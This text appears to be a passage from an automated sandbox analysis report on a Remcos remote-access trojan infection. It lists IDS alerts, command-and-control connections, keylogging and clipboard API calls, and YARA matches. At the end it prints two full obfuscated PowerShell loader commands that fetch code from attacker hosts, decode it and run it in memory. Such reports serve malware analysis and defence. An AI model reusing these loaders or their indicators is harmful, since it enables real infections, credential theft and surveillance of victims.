                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49925 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50055 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50021 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50040 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50058 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50026 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50063 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50027 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50023 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50028 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50041 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50043 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49974 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50050 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50038 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50045 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50051 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50037 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50046 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50020 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49836 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50052 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49990 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50062 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50024 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50060 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50018 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49958 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50057 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50054 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50061 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50059 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50025 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.6:49715
                    Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.6:49771
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.6:49771
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.6:49771
                    Source: Malware configuration extractorURLs: newglobalfucntioninside.duckdns.org
                    Source: unknownDNS query: name: paste.ee
                    Source: unknownDNS query: name: newglobalfucntioninside.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.6:49778 -> 107.173.143.10:14646
                    Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /r/o8fzA/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 151.101.1.137 151.101.1.137
                    Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                    Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49771 -> 104.21.84.67:443
                    Source: global trafficHTTP traffic detected: GET /55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.150.24Connection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03007A18 URLDownloadToFileW,3_2_03007A18
                    Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /r/o8fzA/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.150.24Connection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                    Source: global trafficDNS traffic detected: DNS query: paste.ee
                    Source: global trafficDNS traffic detected: DNS query: newglobalfucntioninside.duckdns.org
                    Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.24/55/creamyk
                    Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2246508978.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2250935390.0000000007465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF
                    Source: powershell.exe, 00000003.00000002.2250935390.0000000007465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF#p
                    Source: powershell.exe, 00000003.00000002.2246508978.0000000002EBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFC:
                    Source: powershell.exe, 00000003.00000002.2252958107.0000000008431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFR
                    Source: powershell.exe, 00000003.00000002.2252958107.0000000008431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFf
                    Source: powershell.exe, 00000003.00000002.2252958107.00000000083B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFs
                    Source: powershell.exe, 00000003.00000002.2252958107.00000000083B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFsx
                    Source: powershell.exe, 00000003.00000002.2250935390.0000000007465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFwp
                    Source: powershell.exe, 00000003.00000002.2252958107.0000000008431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFz
                    Source: powershell.exe, 00000008.00000002.2517116385.0000000006DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: CasPol.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000003.00000002.2249490766.0000000005D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.2247409766.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000004401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.2250935390.000000000743D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                    Source: powershell.exe, 00000003.00000002.2252958107.00000000083B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.G
                    Source: powershell.exe, 00000003.00000002.2250935390.000000000743D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                    Source: powershell.exe, 00000008.00000002.2521068943.0000000007F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co#v
                    Source: powershell.exe, 00000003.00000002.2252958107.0000000008418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.covVc
                    Source: powershell.exe, 00000003.00000002.2247409766.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000004401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000003.00000002.2246508978.0000000002EBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: powershell.exe, 00000003.00000002.2249490766.0000000005D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                    Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49771 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000012_2_004099E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409B10
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BB87 SystemParametersInfoW,12_2_0041BB87

                    System Summary

                    barindex
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate
